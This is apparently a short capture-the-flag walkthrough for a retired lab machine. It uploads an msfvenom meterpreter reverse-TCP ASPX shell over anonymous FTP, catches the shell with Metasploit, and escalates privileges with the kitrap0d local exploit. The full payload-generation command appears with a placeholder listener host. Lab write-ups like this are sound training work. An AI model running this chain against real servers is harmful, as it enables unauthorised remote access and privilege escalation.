Retired Easy Machine by ch4p
- Nmap
- ftp
- Metasploit
- Nmap shows port 21 and 80 is open.
- FTP anynymous login was enabled. So, exploited it with
put shell.aspx
to upload msfvenom shell. msfvenom command used,msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LAB IP> LPORT=<PORT> -f aspx > shell.aspx
- Then used
/multi/handler
to get reverse tcp connection from the shell on metasploit as userIIS APPPOOL\Web
.
- Used
local_exploit_suggester
module for this. - After trying some suggested exploit
exploit/windows/local/ms10_015_kitrap0d
worked. The flags can now be obtained fromc:\Users\babis\Desktop\user.txt.txt
andc:\Users\Administrator\Desktop\root.txt.txt
Author: Zishan Ahamed Thandar